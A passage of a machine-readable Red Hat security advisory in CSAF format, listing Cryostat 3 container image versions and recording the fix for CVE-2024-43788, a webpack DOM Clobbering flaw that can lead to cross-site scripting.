"cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", product: { name: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", product_id: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8-operator&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", product: { name: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", product_id: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-storage-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", product: { name: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", product_id: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", product_identification_helper: { purl: "pkg:oci/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/jfr-datasource-rhel8&tag=3.0.1-3", }, }, }, ], category: "architecture", name: "arm64", }, { branches: [ { category: "product_version", name: "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", product: { name: "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", product_id: "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-db-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", product: { name: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", product_id: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-grafana-dashboard-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", product: { name: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", product_id: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", product: { name: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", product_id: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-reports-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", product: { name: "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", product_id: "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", product: { name: "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", product_id: "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-operator-bundle&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", product: { name: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", product_id: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8-operator&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", product: { name: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", product_id: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-storage-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", product: { name: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", product_id: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", product_identification_helper: { purl: "pkg:oci/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/jfr-datasource-rhel8&tag=3.0.1-3", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", }, product_reference: "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", }, product_reference: "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", }, product_reference: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", }, product_reference: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", }, product_reference: "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", }, product_reference: "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", }, product_reference: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", }, product_reference: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", }, product_reference: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", }, product_reference: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", }, product_reference: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", }, product_reference: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", }, product_reference: "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", }, product_reference: "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", }, product_reference: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", }, product_reference: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", }, product_reference: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", relates_to_product_reference: "8Base-Cryostat-3", }, { category: "default_component_of", full_product_name: { name: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64 as a component of Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", }, product_reference: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", relates_to_product_reference: "8Base-Cryostat-3", }, ], }, vulnerabilities: [ { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T01:12:29+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", 